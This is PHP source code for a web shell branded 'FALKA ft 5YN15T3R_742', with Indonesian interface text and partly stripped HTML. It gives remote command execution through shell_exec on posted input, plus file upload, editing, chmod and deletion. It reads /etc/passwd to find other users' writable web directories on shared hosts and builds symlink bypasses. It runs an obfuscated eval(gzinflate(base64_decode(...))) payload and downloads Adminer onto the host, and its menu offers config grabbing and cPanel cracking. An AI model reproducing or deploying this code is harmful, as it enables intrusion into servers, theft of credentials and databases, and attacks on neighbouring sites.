".$perm.""; } else { return "".$perm.""; } } function r($path,$perm) { if(!is_readable($path)) { return "".$perm.""; } else { return "".$perm.""; } } function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } echo "-FALKA ft 5YN15T3R_742-
FALKA ft 5YN15T3R_742
Path : "; if(get_magic_quotes_gpc()){ foreach($_POST as $key=>$value){ $_POST[$key] = stripslashes($value); } } if(isset($_GET['path'])){ $path = $_GET['path']; }else{ $path = getcwd(); } $path = str_replace('\\','/',$path); $paths = explode('/',$path); foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true; echo '/'; continue; } if($pat == '') continue; echo ''.$pat.'/'; } echo ''; chdir ($path); echo "

Permission Directory : [ ".w($path, perms($path))." ]

"; echo '
'; if(isset($_FILES['cracker'])){ if(copy($_FILES['cracker']['tmp_name'],$path.'/'.$_FILES['cracker']['name'])){ echo 'Berhasil
'; }else{ echo 'Gagal
'; } } $ip = gethostbyname($_SERVER['HTTP_HOST']); $svr = php_uname(); $x = (shell_exec('dir')) ? "ON" : "OFF"; $c = (function_exists('curl_version')) ? "ON" : "OFF"; if(!function_exists('posix_getegid')) { $user = @posix_getpwuid(posix_geteuid()); $user = $user['name']; } else { $user = @posix_getpwuid(posix_geteuid()); $user = $user['name']; } echo "
Kernel : $svr
IP HOST : $ip
"; echo "
Command : $x | Curl : $c
"; echo "
  • [ Home ]
    • "; echo "
  • [ DB Dumper ]
    • "; echo "
  • [ Config Grabber ]
    • "; echo "
  • [ Cpanel Crack ]
    • "; echo "
  • [ Jumping ]
    • "; echo "
  • [ Symlink ]
    • "; echo "
  • [ Bypass Symlink 404 ]
    • "; echo "
  • [ Adminer ]
    • "; echo "
  • [ Logout ]
    • "; echo "
    PHP Execution Command
    $user@$ip:~#
    "; chdir($path); if(isset($_POST['cok'])) { $cok = shell_exec($_POST['cok']); } echo ''; if($_GET['logout'] == true) { unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); echo ""; } elseif($_GET['it'] == 'sym_404') { echo '
    File Target :

    Save Sebagai :

    '; if($_POST['bypass']) { mkdir("sym404", 0777); $dir = $_POST['dir']; $save = $_POST['save']; shell_exec("ln -s".$dir." sym404/".$save); symlink($dir,"sym404/".$save); $fopsym = fopen("sym404/.htaccess","w"); fwrite($fopsym,"ReadmeName ".$save); fclose($fopsym); echo 'Touch !!!'; } } elseif($_GET['it'] == 'sym') { echo '
    '; eval(gzinflate(base64_decode('7Vf/T9tGFP89Uv6Hx5HJ9kjtJKhrReKUrjCt0lakQrdJUEWOfcYeF591d8GklP997852SOME1C/SNqlIRM777vfl81468Zwx8EEqMRE0Z0FI7c7k9PjtH8dvz62jk1fvfj9+czZ5e3JyZr3vAiFd6OSBSpxhu9WJerMgzSSqH8YpozbxqAq9LJjRyA15FhMttbubKIVmZbuVxnat49y2W4ezqygVNpGLbCIXM9LtPXv2TKschsknDEOjNzS0CcvgiQQPBOfK0Dva8z6GYJ3kKuUYzessQlkJv3DGeHG6mP2WZlfo/SgVNFRcLIwAoHE3UbN262UUnS1yCoreKA8zkGbg5kkOhvNrkEWMinVmu3UaqFTGC3iZLSwTRq6DiHlOM9tCw0GIryytrlVYZZiF4RciVZhhlO6WkTvDwzhkXJZELUrDhANpt0YqmDIKAUsvMz+kmcIwplxEVPj7WK8Fo75VpJFKDn7q/TAsOU9Czrg42H3+cw//htZYmxHmM/rE0ngU80yBEfdZOqMg0w/UH4xPXXjD3ZGn2eORp6LPUT7iprhfqP1OUvGlulhmhmVe0/bw3Ynp1JDPUc+HPn6LuaBBmCx7EQIJ1bNuS+xSKuhlapMPPKOkW7Oc2xzJk1mgwmQSMGZbu1oAiO3+6JBdq1sb0Q9lInQ5YzaXia2f0DCOGcMGUSKd2bXQef/9ee+948AYBtp/Z455wFBzLtObySVVeTFPI9uMGC8yKqo5u8bEBJJKj7jrppZdhMVfyx8mpsxhlTgCLtTpcVFhS/oZjZEaQCJo7ONA5weeVxSFu+7bJV5dIxZI6asbNW7KLL0EK560nH71c0sjiGXElrzatdXRgOVVyOBpGPASPqNeQ9nL51OWhhOccWaBCgRm0rcmUxZkV1YjxvX+qQKrOghWy1hla29veHd3t0y0Z6bVdNsdZZLqQp4dn575JTRapmQ5uisiq2wGsI3AZyPhfxsI4TEkhAegELnraAg1HMIDeNgflygHW/DC9Pr+Rmx7RGUDJj3mpIlESxyCT4EIzHsvk0VWegT3LBHEAS6A3qTKJu8y8/aKg5YFrbhj6g5FohtsJ6Yc16umO7qloKP3coxNLyuqcWjQi2pWIESwsEuqDuge3LBZLzwEtRfOxcGF50mNbLK71F03tHo6kHIWu3gn1BI480bjHv2WhhDx+gP4+BEaDN+Hnmbcu/GBTNOMNIg6ZX/1+14sm7zrQHgsnXrZNmYg8kKTNnMveZ5Q0eTJjYEYe9GsyZhLNIWgtCWGWOWb3yrbxNAaiLubGebyIg4mG68vlWZzej9AekAeatwNm+DBbl+Bd61Xh1IrklXPjxiosX0rtK85WEX2BrAvxy/YMnsat5cYU8/FOoiXEK7vVS5hB9P7Z5pFvJDEud2C1U2k1hdrA6fvURq9fiZQ93rPvwFIt1tfDdMPYHRd4mRQFdi6GjC2vx8NlqWBUyquqRh5yWD8TWD99dG/CumKznJMFCHDDp5kfXzsmaeBRnl9haMQnpx2xR75YLjl1709B247eN/pH1FrF58RqLATjwUkOaUz14e/eYplO7C6huySiwybtq6ENZoKb2wN69DKc1N/qRrwKRJNVGbtKCqVi4OIsF2UKyXO5/XaeNqtFDV5ZWyeoqmVZVZvsk1Wv2qTNdfYt9lh3xfY9wX2/11ga8O4YYeNvCi9xs8qZDKcZ9rsylwapTvQmw7u1Tfh36sgyzi+MP5sVhTW0XDpQZsr/1+M/wE='))); } elseif($_GET['it'] == 'admnr') { echo "
    "; $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $path); function adminer($url, $isi) { $fp = fopen($isi, "w"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FILE, $fp); return curl_exec($ch); curl_close($ch); fclose($fp); ob_flush(); flush(); } if(file_exists('adminer.php')) { echo "
    -> adminer login <-
    "; } else { if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) { echo "
    -> adminer login <-
    "; } else { echo "
    gagal buat file adminer
    "; } } } elseif($_GET['it'] == 'jmp') { echo "
    "; $i = 0; echo "
    "; if(preg_match("/hsphere/", $path)) { $urls = explode("\r\n", $_POST['url']); if(isset($_POST['jump'])) { echo "
    ";
			foreach($urls as $url) {
				$url = str_replace(array("http://","www."), "", strtolower($url));
				$etc = "/etc/passwd";
				$f = fopen($etc,"r");
				while($gets = fgets($f)) {
					$pecah = explode(":", $gets);
					$user = $pecah[0];
					$dir_user = "/hsphere/local/home/$user";
					if(is_dir($dir_user) === true) {
						$url_user = $dir_user."/".$url;
						if(is_readable($url_user)) {
							$i++;
							$jrw = "[R] $url_user";
							if(is_writable($url_user)) {
								$jrw = "[RW] $url_user";
							}
							echo $jrw."
    ";
						}
					}
				}
			}
		if($i == 0) { 
		} else {
			echo "
    Total ada ".$i." Kamar di ".$ip;
		}
		echo "
    "; } else { echo '
    List Domains:

    '; } } elseif(preg_match("/vhosts/", $path)) { $urls = explode("\r\n", $_POST['url']); if(isset($_POST['jump'])) { echo "
    ";
			foreach($urls as $url) {
				$web_vh = "/var/www/vhosts/$url/httpdocs";
				if(is_dir($web_vh) === true) {
					if(is_readable($web_vh)) {
						$i++;
						$jrw = "[R] $web_vh";
						if(is_writable($web_vh)) {
							$jrw = "[RW] $web_vh";
						}
						echo $jrw."
    ";
					}
				}
			}
		if($i == 0) { 
		} else {
			echo "
    Total ada ".$i." Kamar di ".$ip;
		}
		echo "
    "; } else { echo '
    List Domains:

    '; } } else { echo "
    ";
		$etc = fopen("/etc/passwd", "r") or die("Can't read /etc/passwd");
		while($passwd = fgets($etc)) {
			if($passwd == '' || !$etc) {
				echo "Can't read /etc/passwd";
			} else {
				preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
				foreach($user_jumping[1] as $user_idx_jump) {
					$user_jumping_dir = "/home/$user_idx_jump/public_html";
					if(is_readable($user_jumping_dir)) {
						$i++;
						$jrw = "[R] $user_jumping_dir";
						if(is_writable($user_jumping_dir)) {
							$jrw = "[RW] $user_jumping_dir";
						}
						echo $jrw;
						if(function_exists('posix_getpwuid')) {
							$domain_jump = file_get_contents("/etc/named.conf");	
							if($domain_jump == '') {
								echo " => ( gabisa ambil nama domain nya )
    ";
							} else {
								preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
								foreach($domains_jump[1] as $dj) {
									$user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
									$user_jumping_url = $user_jumping_url['name'];
									if($user_jumping_url == $user_idx_jump) {
										echo " => ( $dj )
    ";
										break;
									}
								}
							}
						} else {
							echo "
    ";
						}
					}
				}
			}
		}
		if($i == 0) { 
		} else {
			echo "
    Total ada ".$i." Kamar di ".$ip;
		}
		echo "
    "; } echo "
    "; } elseif(isset($_GET['dbdump'])) { echo '
    ';
  echo '

    
Database Dump
Server        : 
Username      : 
Password      : 
DataBase Name : 
DB Type       :
    "; } else { $act = "permission denied"; } } echo $act; echo "
    Filename:
    "; } elseif($_GET['iac'] == 'newfolder') { echo "
    "; if($_POST['new_save_folder']) { $new_folder = $path.'/'.htmlspecialchars($_POST['newfolder']); if(!mkdir($new_folder)) { $act = "permission denied"; } else { $act = ""; } } echo $act; echo "
    Folder Name:
    "; } if(isset($_GET['filesrc'])){ echo "Current File : "; echo $_GET['filesrc']; echo '
    '; echo('
    '.htmlspecialchars(file_get_contents($_GET['filesrc'])).'
    '); }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '
    '.$_POST['path'].'

    '; if($_POST['opt'] == 'chmod'){ if(isset($_POST['perm'])){ if(chmod($_POST['path'],$_POST['perm'])){ echo 'Change Permission Berhasil
    '; }else{ echo 'Change Permission Gagal
    '; } } echo '
    Permission :
    '; }elseif($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo 'Ganti Nama Berhasil
    '; }else{ echo 'Ganti Nama Gagal
    '; } $_POST['name'] = $_POST['newname']; } echo '
    New Name :
    '; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w'); if(fwrite($fp,$_POST['src'])){ echo 'Berhasil Edit File
    '; }else{ echo 'Gagal Edit File
    '; } fclose($fp); } echo '

    '; } echo '
    '; }else{ echo '
    '; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo 'Directory Terhapus
    '; }else{ echo 'Directory Gagal Terhapus
    '; } }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){ echo 'File Terhapus
    '; }else{ echo 'File Gagal Dihapus
    '; } } } echo '
    '; $scandir = scandir($path); echo '
    '; foreach($scandir as $dir){ if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue; echo ''; } echo ''; foreach($scandir as $file){ if(!is_file($path.'/'.$file)) continue; $size = filesize($path.'/'.$file)/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; }else{ $size = $size.' KB'; } echo ''; } echo '
    Name
    Size
    Permission
    Modify
    '.$dir.'
    --
    '; if(is_writable($path.'/'.$dir)) ; elseif(!is_readable($path.'/'.$dir)) echo ''; echo perms($path.'/'.$dir); if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo ''; echo '
    '.$file.'
    '.$size.'
    '; if(is_writable($path.'/'.$file)) ; elseif(!is_readable($path.'/'.$file)) echo ''; echo perms($path.'/'.$file); if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo ''; echo '
    '; } echo "
    Blog Copyright FALKA - 2018 follow IG
    "; ?>